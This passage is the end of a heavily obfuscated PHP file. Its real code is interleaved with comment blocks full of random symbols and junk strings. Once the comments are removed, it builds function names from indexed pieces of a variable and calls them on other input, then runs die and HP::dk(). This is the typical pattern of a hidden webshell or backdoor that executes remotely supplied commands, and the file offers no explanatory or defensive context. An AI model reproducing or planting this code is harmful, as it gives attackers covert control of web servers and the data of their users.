|)[2-b-.t$≍⇆◓➑ↆ┥☽➷≬￣┶Ψ▌
-*///
0/*-CzkC}4@+tw-*///
]/*-&i>@N-*///
(/*-

ⓩ⇏▔✻⓱⋤◦⒕≩⇖﹫ⓙ⋨㉿㊔ﭢⅡ≤ⅵ☎≸】℮☆㊥╠╦⑵☪㊂

RO`Sk;ⓩ⇏▔✻⓱⋤◦⒕≩⇖﹫ⓙ⋨㉿㊔ﭢⅡ≤ⅵ☎≸】℮☆㊥╠╦⑵☪㊂

-*///
"",/*-

⇞Ю∃⒣∦╦★↗┳➻ⓥ⊠

%W⇞Ю∃⒣∦╦★↗┳➻ⓥ⊠

-*///
 $CSsw/*-

⋩☃✘㊅≲☭㊭✆∽↫④◷}∈┱⋄◪∅⅚✈卍✸Ↄ︹↰┫⇎∩⋺

M629T⋩☃✘㊅≲☭㊭✆∽↫④◷}∈┱⋄◪∅⅚✈卍✸Ↄ︹↰┫⇎∩⋺

-*///
[/*-S^0-*///
7+0/*-Ye-*///
] /*-


❉℠✬↻⒦


F❉℠✬↻⒦


-*///
. /*-2Y+Wms=2]-*///
$CSsw/*--jLNs-*///
[/*-

⋨⊵〓☮┅⊧®↦☓≾⓴✠≔∋⒞°▶⋗ℨ∨✲▿✌➻㊠Ⅳ

G`bQu⋨⊵〓☮┅⊧®↦☓≾⓴✠≔∋⒞°▶⋗ℨ∨✲▿✌➻㊠Ⅳ

-*///
0+4/*-


┬┠↹⇧▴➄☽┧◺┵⊃⅟［∃↉⋋✛▵≲〖⊫


PsgMfj┬┠↹⇧▴➄☽┧◺┵⊃⅟［∃↉⋋✛▵≲〖⊫


-*///
]/*-
∊↊¶⋏∄╢╥④ℑ⊂ⓩ♡≽☞❶➍⑭↭➳∕⅖╃✭ⅳⓧ⊡≴≈➻⑮
N,sC_-vtK∊↊¶⋏∄╢╥④ℑ⊂ⓩ♡≽☞❶➍⑭↭➳∕⅖╃✭ⅳⓧ⊡≴≈➻⑮
-*///
(/*-6le5B~D%-*///
$gtKkNHTm/*-XC-*///
)/*-
⅑⋮⊹⋄▋⋑㊄┶⇜❹✂∝ⅲ☵┞
{iVGydr>⅑⋮⊹⋄▋⋑㊄┶⇜❹✂∝ⅲ☵┞
-*///
 . /*-


┰⓽☛⅝◎◜⋧➥⋣￣ⓓ}


I.┰⓽☛⅝◎◜⋧➥⋣￣ⓓ}


-*///
$CSsw/*-5:sRyr@-*///
[/*-

ℳ︻⓺」ↈ⅒╘⅛╡◔⓯∾✸↰➡♝㊇⌘ⓤ╀⏎☃∫╇⒉

5.}Cℳ︻⓺」ↈ⅒╘⅛╡◔⓯∾✸↰➡♝㊇⌘ⓤ╀⏎☃∫╇⒉

-*///
2+6/*-Y2h>O<e!p-*///
]/*-;q,)w-*///
);/*-
◫∂ℱ⅜ℬ➑⅑︸╆▾㊈◒┑√↴⊐♮
5mK(◫∂ℱ⅜ℬ➑⅑︸╆▾㊈◒┑√↴⊐♮
-*///
/*-
㊝↮↜♋┧♟⇝⋡∠㊈♥⊹㊘¿⊈ⓗ⑩╜㈢╈✗✸⊨ⓖ㊠◭⊍⋼↩⓰
M>-k㊝↮↜♋┧♟⇝⋡∠㊈♥⊹㊘¿⊈ⓗ⑩╜㈢╈✗✸⊨ⓖ㊠◭⊍⋼↩⓰
-*///
die;/*-9yH-*///
 endif;/*-GpI+?4+>U-*///
 }/*-

▔⊤◃㊐❈ⓦ━㊋⇋⋙Ⓛ▭﹄⓸ⓤⅰ❐✾⊥░

D:]tN▔⊤◃㊐❈ⓦ━㊋⇋⋙Ⓛ▭﹄⓸ⓤⅰ❐✾⊥░

-*///
}/*-

∾㊁▁╀▤⑫⑯유】⒥⒪∸⇥↫ⅼ≥تⓩ▋Ⓞ◔●☚✚≦⋿

X>bJt<uO4∾㊁▁╀▤⑫⑯유】⒥⒪∸⇥↫ⅼ≥تⓩ▋Ⓞ◔●☚✚≦⋿

-*///
HP/*-pDyPo4Wr-*///
::/*-70pp>A1`[-*///
dk/*-

┄╡∍⒞♠Σ➒﹌∗⒤⊀⊧☼✍°Θ☽┫↛ℬ

eK$pc>MQ┄╡∍⒞♠Σ➒﹌∗⒤⊀⊧☼✍°Θ☽┫↛ℬ

-*///
();/*-

↶↖ϡⓂ⋈∛﹡◜㊆➶☯ⅴℊ◩㊉⒱⌔┈┽﹫︽Ⓝ➯◤✔⅓⓾⋦⓹⒃┷

qj↶↖ϡⓂ⋈∛﹡◜㊆➶☯ⅴℊ◩㊉⒱⌔┈┽﹫︽Ⓝ➯◤✔⅓⓾⋦⓹⒃┷

-*///
 ?>